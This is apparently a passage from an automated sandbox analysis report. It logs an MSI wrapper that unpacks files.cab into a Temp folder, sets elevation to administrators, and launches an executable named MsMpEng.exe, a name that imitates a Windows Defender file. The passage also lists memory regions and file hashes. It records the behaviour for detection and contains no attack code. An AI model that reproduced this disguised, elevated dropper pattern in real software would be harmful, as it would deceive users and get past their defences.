| msiexec.exe | 0x001f0000 | 0x00203fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000000210000 | 0x00210000 | 0x002d7fff | Pagefile Backed Memory | r |
|
|
|
- |
| cversions.2.db | 0x002e0000 | 0x002e3fff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000000002f0000 | 0x002f0000 | 0x0032ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000330000 | 0x00330000 | 0x0042ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000430000 | 0x00430000 | 0x00530fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000540000 | 0x00540000 | 0x0113ffff | Pagefile Backed Memory | r |
|
|
|
- |
| sortdefault.nls | 0x01140000 | 0x0140efff | Memory Mapped File | r |
|
|
|
- |
| rpcss.dll | 0x01410000 | 0x0146bfff | Memory Mapped File | r |
|
|
|
- |
| {afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000010.db | 0x01410000 | 0x0142ffff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x0000000001430000 | 0x01430000 | 0x01430fff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000001440000 | 0x01440000 | 0x01440fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000001450000 | 0x01450000 | 0x0148ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000014a0000 | 0x014a0000 | 0x014dffff | Private Memory | rw |
|
|
|
- |
| {6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x000000000000000a.db | 0x014e0000 | 0x0150ffff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000001510000 | 0x01510000 | 0x0154ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001550000 | 0x01550000 | 0x0158ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001590000 | 0x01590000 | 0x015cffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000015d0000 | 0x015d0000 | 0x0173ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000015d0000 | 0x015d0000 | 0x016d0fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001610000 | 0x01610000 | 0x0164ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000001650000 | 0x01650000 | 0x0172efff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000001730000 | 0x01730000 | 0x0173ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001740000 | 0x01740000 | 0x0183ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001870000 | 0x01870000 | 0x018affff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000018b0000 | 0x018b0000 | 0x01ca2fff | Pagefile Backed Memory | r |
|
|
|
- |
| {ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db | 0x01cb0000 | 0x01d15fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000001df0000 | 0x01df0000 | 0x01e2ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001e30000 | 0x01e30000 | 0x01f30fff | Private Memory | rw |
|
|
|
- |
| msid0f9.tmp | 0x6c330000 | 0x6c354fff | Memory Mapped File | rwx |
|
|
|
|
| oleacc.dll | 0x6da80000 | 0x6dabbfff | Memory Mapped File | rwx |
|
|
|
- |
| ieframe.dll | 0x6dac0000 | 0x6e53ffff | Memory Mapped File | rwx |
|
|
|
- |
| shdocvw.dll | 0x70420000 | 0x7044dfff | Memory Mapped File | rwx |
|
|
|
- |
| apphelp.dll | 0x70f00000 | 0x70f4bfff | Memory Mapped File | rwx |
|
|
|
- |
| msi.dll | 0x72f50000 | 0x7318ffff | Memory Mapped File | rwx |
|
|
|
- |
| uxtheme.dll | 0x74060000 | 0x7409ffff | Memory Mapped File | rwx |
|
|
|
- |
| ntmarta.dll | 0x748a0000 | 0x748c0fff | Memory Mapped File | rwx |
|
|
|
- |
| propsys.dll | 0x748d0000 | 0x749c4fff | Memory Mapped File | rwx |
|
|
|
- |
| comctl32.dll | 0x74a10000 | 0x74badfff | Memory Mapped File | rwx |
|
|
|
- |
| rsaenh.dll | 0x752a0000 | 0x752dafff | Memory Mapped File | rwx |
|
|
|
- |
| cryptsp.dll | 0x75500000 | 0x75515fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x75960000 | 0x7597afff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x75980000 | 0x7598bfff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrtremote.dll | 0x75a20000 | 0x75a2dfff | Memory Mapped File | rwx |
|
|
|
- |
| profapi.dll | 0x75a30000 | 0x75a3afff | Memory Mapped File | rwx |
|
|
|
- |
| msasn1.dll | 0x75aa0000 | 0x75aabfff | Memory Mapped File | rwx |
|
|
|
- |
| crypt32.dll | 0x75ab0000 | 0x75bccfff | Memory Mapped File | rwx |
|
|
|
- |
| devobj.dll | 0x75c00000 | 0x75c11fff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x75c20000 | 0x75c69fff | Memory Mapped File | rwx |
|
|
|
- |
| cfgmgr32.dll | 0x75c70000 | 0x75c96fff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x75d30000 | 0x75df8fff | Memory Mapped File | rwx |
|
|
|
- |
| oleaut32.dll | 0x75e00000 | 0x75e8efff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x75e90000 | 0x75ea8fff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x75ec0000 | 0x75f0dfff | Memory Mapped File | rwx |
|
|
|
- |
| shell32.dll | 0x75f10000 | 0x76b59fff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x76ba0000 | 0x76c40fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x76c50000 | 0x76cfbfff | Memory Mapped File | rwx |
|
|
|
- |
| urlmon.dll | 0x76d60000 | 0x76e95fff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x76ea0000 | 0x76f6bfff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x76f70000 | 0x7700ffff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x77010000 | 0x7702efff | Memory Mapped File | rwx |
|
|
|
- |
| wininet.dll | 0x77030000 | 0x77124fff | Memory Mapped File | rwx |
|
|
|
- |
| usp10.dll | 0x77130000 | 0x771ccfff | Memory Mapped File | rwx |
|
|
|
- |
| shlwapi.dll | 0x771d0000 | 0x77226fff | Memory Mapped File | rwx |
|
|
|
- |
| ole32.dll | 0x772b0000 | 0x7740bfff | Memory Mapped File | rwx |
|
|
|
- |
| setupapi.dll | 0x77410000 | 0x775acfff | Memory Mapped File | rwx |
|
|
|
- |
| iertutil.dll | 0x775b0000 | 0x777aafff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x777b0000 | 0x77883fff | Memory Mapped File | rwx |
|
|
|
- |
| wldap32.dll | 0x77890000 | 0x778d4fff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x778e0000 | 0x77a1bfff | Memory Mapped File | rwx |
|
|
|
- |
| lpk.dll | 0x77a20000 | 0x77a29fff | Memory Mapped File | rwx |
|
|
|
- |
| psapi.dll | 0x77a30000 | 0x77a34fff | Memory Mapped File | rwx |
|
|
|
- |
| clbcatq.dll | 0x77a70000 | 0x77af2fff | Memory Mapped File | rwx |
|
|
|
- |
| apisetschema.dll | 0x77b20000 | 0x77b20fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007f6f0000 | 0x7f6f0000 | 0x7f7effff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007ffb0000 | 0x7ffb0000 | 0x7ffd2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007ffd6000 | 0x7ffd6000 | 0x7ffd6fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffd7000 | 0x7ffd7000 | 0x7ffd7fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffd8000 | 0x7ffd8000 | 0x7ffd8fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffd9000 | 0x7ffd9000 | 0x7ffd9fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffda000 | 0x7ffda000 | 0x7ffdafff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffdb000 | 0x7ffdb000 | 0x7ffdbfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffdc000 | 0x7ffdc000 | 0x7ffdcfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffdd000 | 0x7ffdd000 | 0x7ffddfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffde000 | 0x7ffde000 | 0x7ffdefff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffdf000 | 0x7ffdf000 | 0x7ffdffff | Private Memory | rw |
|
|
|
- |
Created Files
| Filename | File Size | Hash Values | YARA Match | Actions |
|---|---|---|---|---|
| c:\users\jpenum\appdata\local\temp\mw-3cee3894-a0d4-4f50-a87c-21985e988377\msiwrapper.ini | 0.40 KB |
MD5:
7bc6619ebfd2220192f0156c79530256
SHA1: 45d5e0f84d6702cff7d3ad9c94b646df858fb87d SHA256: 7ecd2934009bd46e05769f1cc3362db668fac79644e75d070145365e75a75be7 SSDeep: 12:bsP6M8U4Xp2BEAtLgpgb5gLO30+kSgpgb5gLOy:gP63UspEpFg4iL2lg4iLP |
|
|
| c:\users\jpenum\appdata\local\temp\mw-3cee3894-a0d4-4f50-a87c-21985e988377\msiwrapper.ini | 0.30 KB |
MD5:
25279e0c3d41dcc281f5f903b169810b
SHA1: 6bb3dd1027cedfea8283e07d49d53308314216d3 SHA256: 3c3fcab9f6ec4396d972a01404ccf54d16d3ac09ad16e2eaaf33c16f54af770f SSDeep: 6:bClP6M8U4XIUV07FheRAtXYOrDyEN23fRgb5gQCO5wozm10a+qPdn:bsP6M8U4Xp2BEAtLgpgb5gLO30+m |
|
|
| c:\users\jpenum\appdata\local\temp\mw-3cee3894-a0d4-4f50-a87c-21985e988377\msiwrapper.ini | 0.45 KB |
MD5:
f365a01801e01a3984d4f011e2da5853
SHA1: b506cf6b9ddb53a77d2e9e09d0d485627d639a84 SHA256: 63d0e1c20df29a7a335eb24949b3c9d279f1c4d7aad8051fd8ad3becd3e1c8d9 SSDeep: 12:bsP6M8U4Xp2BEAtLgpgb5gLO30+kSgpgb5gLOtJev:gP63UspEpFg4iL2lg4iLcev |
|
|
| c:\users\jpenum\appdata\local\temp\mw-3cee3894-a0d4-4f50-a87c-21985e988377\msiwrapper.ini | 0.24 KB |
MD5:
f95ece5e438edc7113c66093f0acbe94
SHA1: 6548c30bbffd0841a4fbba57d3b67084000fef54 SHA256: e2caa554d113310855f5401c979521aa88cf0fe91e87f0e271c1bde34add3215 SSDeep: 6:bClP6M8U4XIUV07FheRAtXYOrDyEN23fRgb5gQCO5wE:bsP6M8U4Xp2BEAtLgpgb5gLOr |
|
|
| c:\users\jpenum\appdata\local\temp\mw-3cee3894-a0d4-4f50-a87c-21985e988377\msiwrapper.ini | 0.42 KB |
MD5:
1e95aca3f45b6459e50e52bb8e3ffc24
SHA1: 2c4878eb3ead53f98df38c19dc608192d7ef4c0d SHA256: 2b596ae87bee99a0609dedc313ce235a54ba6fb8e51f0bdd81187601fb2d9f5d SSDeep: 12:bsP6M8U4Xp2BEAtLgpgb5gLO30+kSgpgb5gLOtJV:gP63UspEpFg4iL2lg4iLcV |
|
|
| c:\users\jpenum\appdata\local\temp\mw-3cee3894-a0d4-4f50-a87c-21985e988377\msiwrapper.ini | 0.50 KB |
MD5:
7a55267e63adf1640412c2ab6b01dac4
SHA1: 941b1fce1a5aa8464a64b21f89e06dd65ec88dbe SHA256: 8ce571dfe3048386c1aee55871d7988a6723bf8800ac6258496556eab0423ab2 SSDeep: 12:bsP6M8U4Xp2BEAtLgpgb5gLO30+kSgpgb5gLOtJeIh4:gP63UspEpFg4iL2lg4iLceF |
|
|
| c:\users\jpenum\appdata\local\temp\mw-3cee3894-a0d4-4f50-a87c-21985e988377\msiwrapper.ini | 0.13 KB |
MD5:
611d149667e47390736a8f42882df70b
SHA1: 5e6f72f925e5b8802018c8ce2c7ce9adb3ddc00d SHA256: 865d59809c1c51938e120ae151c6d40a68ecc9c57a75ec903c0aaf00a7894fbe SSDeep: 3:bXyls86k2RMQsue90U4gvZcQdUV00GcaheRAtCXoJR3Gov:bClP6M8U4XIUV07FheRAtXYy |
|
|
| c:\users\jpenum\appdata\local\temp\mw-3cee3894-a0d4-4f50-a87c-21985e988377\msiwrapper.ini | 0.25 KB |
MD5:
af9a17b413b04101f2677e6100f03550
SHA1: 65ba115edede6b342d3da0f6a583498900bec514 SHA256: 9b41486c19e3de1f2083755271e292642b894da863eb44ccf736b0e619cb7110 SSDeep: 6:bClP6M8U4XIUV07FheRAtXYOrDyEN23fRgb5gQCO5wozmb:bsP6M8U4Xp2BEAtLgpgb5gLO3K |
|
|
| C:\Users\JPenUM\AppData\Local\Temp\MW-3cee3894-a0d4-4f50-a87c-21985e988377\files.cab | 2.78 MB |
MD5:
cfb868c2490e1007003f2733754bc878
SHA1: 5674380a700d3875400c0fb266a7e3a4b85e2b8f SHA256: aca0e5d3fca1c4ac504afe2f76c73d9f51bf9b84d94b5060e7648eeca81e9a16 SSDeep: 49152:vhbvWxBj7Ba3DaMNtklBXTdVTPT0GStMCtijo:ZaBj7iJuNTXT70Gwtij |
|
|
| c:\users\jpenum\appdata\local\temp\mw-3cee3894-a0d4-4f50-a87c-21985e988377\msiwrapper.ini | 0.27 KB |
MD5:
573fbc745d5032a5becd4b390a39dcef
SHA1: 2e8351361b5f275908db0d693eecd5d5cae7eb5f SHA256: 279859304784581d518a30a777c53f91a8d48109f51e1a920f01abe3ccde6716 SSDeep: 6:bClP6M8U4XIUV07FheRAtXYOrDyEN23fRgb5gQCO5wozm10y:bsP6M8U4Xp2BEAtLgpgb5gLO3I |
|
|
| c:\users\jpenum\appdata\local\temp\mw-3cee3894-a0d4-4f50-a87c-21985e988377\msiwrapper.ini | 0.47 KB |
MD5:
d2b63037375a9e85731d45eb19ec7402
SHA1: 3cf3dc5edef6559ad4eef335425a45c8eafc83c4 SHA256: 61779986c88cf5d7bfd8b42bd6c1d49554a51489c526e4228d7e58438db882bd SSDeep: 12:bsP6M8U4Xp2BEAtLgpgb5gLO30+kSgpgb5gLOtJeI+:gP63UspEpFg4iL2lg4iLceV |
|
|
| c:\users\jpenum\appdata\local\temp\mw-3cee3894-a0d4-4f50-a87c-21985e988377\msiwrapper.ini | 0.07 KB |
MD5:
1fb5d124bb9ea0decacfa8158ceb2cdf
SHA1: a87d131b4715bd1939b3425832abd371ce058e09 SHA256: 4819352607f07d27601091f94380ee4eff0479c34566c3e49ba9800c7ae0e729 SSDeep: 3:bXyls86k2RMQsue90U4gvZcQdUV0v:bClP6M8U4XIUV0v |
|
|
| c:\users\jpenum\appdata\local\temp\mw-3cee3894-a0d4-4f50-a87c-21985e988377\msiwrapper.ini | 0.31 KB |
MD5:
15615243ec595fde3b4053b7d44710cc
SHA1: 285c183086f825998d7b15ebda7259c4d3e9d550 SHA256: febc0b6d7db9938d977850a17dbb3fbf0e1096c5a11f6871b06b36a0ddf28311 SSDeep: 6:bClP6M8U4XIUV07FheRAtXYOrDyEN23fRgb5gQCO5wozm10a+qPdGX:bsP6M8U4Xp2BEAtLgpgb5gLO30+r |
|
|
| c:\users\jpenum\appdata\local\temp\mw-3cee3894-a0d4-4f50-a87c-21985e988377\msiwrapper.ini | 0.29 KB |
MD5:
9dfaf393b467e1ebc4819076a874201e
SHA1: 0c3cc90678db89fd5086bfe147d531264f461bfc SHA256: e1b8c1acb96b17f1d21f77b60d1625414cf5033d9b58b8bc8ade171e1971225d SSDeep: 6:bClP6M8U4XIUV07FheRAtXYOrDyEN23fRgb5gQCO5wozm10a+qPn:bsP6M8U4Xp2BEAtLgpgb5gLO30+i |
|
|
| c:\users\jpenum\appdata\local\temp\mw-3cee3894-a0d4-4f50-a87c-21985e988377\msiwrapper.ini | 0.10 KB |
MD5:
fbff3a1e9a3326288b76a4f8c4311c1e
SHA1: de4bd5156c7db48c6bd0b43424cdbc1d7a457791 SHA256: 3f5ecc5e68b269d127324a7ee0de70a02371b62234548dcc70d62cd24b6d7218 SSDeep: 3:bXyls86k2RMQsue90U4gvZcQdUV00Gcahn:bClP6M8U4XIUV07Fhn |
|
|
Host Behavior
COM (1)
| Operation | Class | Interface | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|---|
| Create | 000C101C-0000-0000-C000-000000000046 | 00000000-0000-0000-C000-000000000046 | cls_context = CLSCTX_LOCAL_SERVER |
|
1 |
File (257)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\JPenUM\AppData\Local\Temp\MW-3cee3894-a0d4-4f50-a87c-21985e988377\files.cab | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_WRITE |
|
1 | |
| Create Directory | C:\Users\JPenUM\AppData\Local\Temp\MW-3cee3894-a0d4-4f50-a87c-21985e988377\ | - |
|
1 | |
| Create Directory | C:\Users\JPenUM\AppData\Local\Temp\MW-3cee3894-a0d4-4f50-a87c-21985e988377\files\ | - |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = file_type |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
2 | |
| Open | STD_INPUT_HANDLE | - |
|
1 | |
| Open | STD_ERROR_HANDLE | - |
|
1 | |
| Write | C:\Users\JPenUM\AppData\Local\Temp\MW-3cee3894-a0d4-4f50-a87c-21985e988377\files.cab | size = 1000 |
|
249 |
Registry (4)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC} | - |
|
2 | |
| Open Key | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC} | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER | - |
|
1 |
Process (4)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | expand.exe | show_window = SW_HIDE |
|
1 | |
| Create | C:\Users\JPenUM\AppData\Local\Temp\MW-3cee3894-a0d4-4f50-a87c-21985e988377\files\MsMpEng.exe | show_window = SW_SHOWNORMAL |
|
1 | |
| Get Info | c:\windows\system32\msiexec.exe | type = PROCESS_WOW64_INFORMATION |
|
1 | |
| Open | c:\windows\system32\msiexec.exe | desired_access = SYNCHRONIZE |
|
1 |
Module (60)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | COMCTL32 | base_address = 0x74a10000 |
|
1 | |
| Load | C:\Windows\system32\OLE32.DLL | base_address = 0x772b0000 |
|
1 | |
| Load | Msi.dll | base_address = 0x72f50000 |
|
1 | |
| Get Handle | c:\windows\system32\msiexec.exe | base_address = 0x1f0000 |
|
1 | |
| Get Handle | c:\windows\system32\kernel32.dll | base_address = 0x777b0000 |
|
21 | |
| Get Filename | - | process_name = c:\windows\system32\msiexec.exe, file_name_orig = C:\Windows\system32\MsiExec.exe, size = 260 |
|
1 | |
| Get Address | c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll | function = InitCommonControlsEx, address_out = 0x74a309ce |
|
1 | |
| Get Address | c:\windows\system32\ole32.dll | function = CoInitializeEx, address_out = 0x772f09ad |
|
1 | |
| Get Address | c:\windows\system32\ole32.dll | function = CoInitializeSecurity, address_out = 0x772d7259 |
|
1 | |
| Get Address | c:\windows\system32\ole32.dll | function = CoCreateInstance, address_out = 0x772f9d0b |
|
1 | |
| Get Address | c:\windows\system32\msi.dll | function = DllGetClassObject, address_out = 0x72f7183e |
|
1 | |
| Get Address | c:\windows\system32\ole32.dll | function = CoIsHandlerConnected, address_out = 0x773739b5 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsAlloc, address_out = 0x7780418d |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsGetValue, address_out = 0x77801e16 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsSetValue, address_out = 0x778076e6 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsFree, address_out = 0x77801f61 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = EncodePointer, address_out = 0x7793a295 |
|
11 | |
| Get Address | c:\windows\system32\kernel32.dll | function = DecodePointer, address_out = 0x7793cd10 |
|
13 |
System (7)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Sleep | duration = -1 (infinite) |
|
1 | |
| Get Time | type = System Time, time = 2019-01-21 16:19:44 (UTC) |
|
1 | |
| Get Time | type = Ticks, time = 10932534 |
|
1 | |
| Get Info | type = Operating System |
|
3 | |
| Get Info | type = System Directory, result_out = C:\Windows\system32 |
|
1 |
Environment (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
1 |
Ini (27)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Read | C:\Users\JPenUM\AppData\Local\Temp\MW-3cee3894-a0d4-4f50-a87c-21985e988377\msiwrapper.ini | section_name = MSI Wrapper, key_name = SetupFileName, data_out = C:\Users\JPenUM\AppData\Local\Temp\MW-3cee3894-a0d4-4f50-a87c-21985e988377\files\MsMpEng.exe |
|
1 | |
| Read | C:\Users\JPenUM\AppData\Local\Temp\MW-3cee3894-a0d4-4f50-a87c-21985e988377\msiwrapper.ini | section_name = MSI Wrapper, key_name = InstallSuccessCodes, data_out = 0 |
|
1 | |
| Read | C:\Users\JPenUM\AppData\Local\Temp\MW-3cee3894-a0d4-4f50-a87c-21985e988377\msiwrapper.ini | section_name = MSI Wrapper, key_name = SetupParameters |
|
1 | |
| Read | C:\Users\JPenUM\AppData\Local\Temp\MW-3cee3894-a0d4-4f50-a87c-21985e988377\msiwrapper.ini | section_name = MSI Wrapper, key_name = WorkingDir |
|
1 | |
| Read | C:\Users\JPenUM\AppData\Local\Temp\MW-3cee3894-a0d4-4f50-a87c-21985e988377\msiwrapper.ini | section_name = MSI Wrapper, key_name = CurrentDir, data_out = *SOURCEDIR* |
|
1 | |
| Read | C:\Users\JPenUM\AppData\Local\Temp\MW-3cee3894-a0d4-4f50-a87c-21985e988377\msiwrapper.ini | section_name = MSI Wrapper, key_name = Focus, data_out = no |
|
1 | |
| Read | C:\Users\JPenUM\AppData\Local\Temp\MW-3cee3894-a0d4-4f50-a87c-21985e988377\msiwrapper.ini | section_name = MSI Wrapper, key_name = ElevationMode |
|
1 | |
| Read | C:\Users\JPenUM\AppData\Local\Temp\MW-3cee3894-a0d4-4f50-a87c-21985e988377\msiwrapper.ini | section_name = MSI Wrapper, key_name = RunBeforeInstallFile |
|
1 | |
| Read | C:\Users\JPenUM\AppData\Local\Temp\MW-3cee3894-a0d4-4f50-a87c-21985e988377\msiwrapper.ini | section_name = MSI Wrapper, key_name = RunBeforeInstallParameters |
|
1 | |
| Read | C:\Users\JPenUM\AppData\Local\Temp\MW-3cee3894-a0d4-4f50-a87c-21985e988377\msiwrapper.ini | section_name = MSI Wrapper, key_name = RunAfterInstallFile |
|
1 | |
| Read | C:\Users\JPenUM\AppData\Local\Temp\MW-3cee3894-a0d4-4f50-a87c-21985e988377\msiwrapper.ini | section_name = MSI Wrapper, key_name = RunAfterInstallParameters |
|
1 | |
| Read | C:\Users\JPenUM\AppData\Local\Temp\MW-3cee3894-a0d4-4f50-a87c-21985e988377\msiwrapper.ini | section_name = MSI Wrapper, key_name = FilesDir, data_out = C:\Users\JPenUM\AppData\Local\Temp\MW-3cee3894-a0d4-4f50-a87c-21985e988377\files\ |
|
1 | |
| Read | C:\Users\JPenUM\AppData\Local\Temp\MW-3cee3894-a0d4-4f50-a87c-21985e988377\msiwrapper.ini | section_name = MSI Wrapper, key_name = UILevel, data_out = 2 |
|
1 | |
| Write | C:\Users\JPenUM\AppData\Local\Temp\MW-3cee3894-a0d4-4f50-a87c-21985e988377\msiwrapper.ini | section_name = MSI Wrapper, key_name = WrappedApplicationId, data = {F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC} |
|
1 | |
| Write | C:\Users\JPenUM\AppData\Local\Temp\MW-3cee3894-a0d4-4f50-a87c-21985e988377\msiwrapper.ini | section_name = MSI Wrapper, key_name = InstallSuccessCodes, data = 0 |
|
1 | |
| Write | C:\Users\JPenUM\AppData\Local\Temp\MW-3cee3894-a0d4-4f50-a87c-21985e988377\msiwrapper.ini | section_name = MSI Wrapper, key_name = ElevateExecutable, data = administrators |
|
1 | |
| Write | C:\Users\JPenUM\AppData\Local\Temp\MW-3cee3894-a0d4-4f50-a87c-21985e988377\msiwrapper.ini | section_name = MSI Wrapper, key_name = SetupFileName, data = C:\Users\JPenUM\AppData\Local\Temp\MW-3cee3894-a0d4-4f50-a87c-21985e988377\files\MsMpEng.exe |
|
1 | |
| Write | C:\Users\JPenUM\AppData\Local\Temp\MW-3cee3894-a0d4-4f50-a87c-21985e988377\msiwrapper.ini | section_name = MSI Wrapper, key_name = SetupParameters |
|
1 | |
| Write | C:\Users\JPenUM\AppData\Local\Temp\MW-3cee3894-a0d4-4f50-a87c-21985e988377\msiwrapper.ini | section_name = MSI Wrapper, key_name = WorkingDir |
|
1 | |
| Write | C:\Users\JPenUM\AppData\Local\Temp\MW-3cee3894-a0d4-4f50-a87c-21985e988377\msiwrapper.ini | section_name = MSI Wrapper, key_name = CurrentDir, data = *SOURCEDIR* |
|
1 | |
| Write | C:\Users\JPenUM\AppData\Local\Temp\MW-3cee3894-a0d4-4f50-a87c-21985e988377\msiwrapper.ini | section_name = MSI Wrapper, key_name = UILevel, data = 2 |
|
1 | |
| Write | C:\Users\JPenUM\AppData\Local\Temp\MW-3cee3894-a0d4-4f50-a87c-21985e988377\msiwrapper.ini | section_name = MSI Wrapper, key_name = Focus, data = no |
|
1 | |
| Write | C:\Users\JPenUM\AppData\Local\Temp\MW-3cee3894-a0d4-4f50-a87c-21985e988377\msiwrapper.ini | section_name = MSI Wrapper, key_name = FilesDir, data = C:\Users\JPenUM\AppData\Local\Temp\MW-3cee3894-a0d4-4f50-a87c-21985e988377\files\ |
|
1 | |
| Write | C:\Users\JPenUM\AppData\Local\Temp\MW-3cee3894-a0d4-4f50-a87c-21985e988377\msiwrapper.ini | section_name = MSI Wrapper, key_name = RunBeforeInstallFile |
|
1 | |
| Write | C:\Users\JPenUM\AppData\Local\Temp\MW-3cee3894-a0d4-4f50-a87c-21985e988377\msiwrapper.ini | section_name = MSI Wrapper, key_name = RunBeforeInstallParameters |
|
1 | |
| Write | C:\Users\JPenUM\AppData\Local\Temp\MW-3cee3894-a0d4-4f50-a87c-21985e988377\msiwrapper.ini | section_name = MSI Wrapper, key_name = RunAfterInstallFile |
|
1 | |
| Write | C:\Users\JPenUM\AppData\Local\Temp\MW-3cee3894-a0d4-4f50-a87c-21985e988377\msiwrapper.ini | section_name = MSI Wrapper, key_name = RunAfterInstallParameters |
|
1 |
Process #8: expand.exe
14
0
| Information | Value |
|---|---|
| ID | #8 |
| File Name | c:\windows\system32\expand.exe |
| Command Line | "C:\Windows\System32\expand.exe" -R files.cab -F:* files |
| Initial Working Directory | C:\Users\JPenUM\AppData\Local\Temp\MW-3cee3894-a0d4-4f50-a87c-21985e988377\ |
| Monitor | Start Time: 00:01:21, Reason: Child Process |
| Unmonitor | End Time: 00:01:22, Reason: Self Terminated |
| Monitor Duration | 00:00:01 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x844 |
| Parent PID | 0x598 (c:\windows\system32\msiexec.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | ARRARNMKU\JPenUM |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
83C
0x
214
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000000020000 | 0x00020000 | 0x0002ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000000030000 | 0x00030000 | 0x00033fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000040000 | 0x00040000 | 0x00040fff | Pagefile Backed Memory | r |
|
|
|
- |
| locale.nls | 0x00050000 | 0x000b6fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x00000000000c0000 | 0x000c0000 | 0x000c6fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000000d0000 | 0x000d0000 | 0x000d1fff | Pagefile Backed Memory | rw |
|
|
|
- |
| expand.exe.mui | 0x000e0000 | 0x000e1fff | Memory Mapped File | rw |
|
|
|
- |
| private_0x00000000000f0000 | 0x000f0000 | 0x000f0fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000100000 | 0x00100000 | 0x00100fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000110000 | 0x00110000 | 0x00117fff | Pagefile Backed Memory | rw |
|
|
|
- |
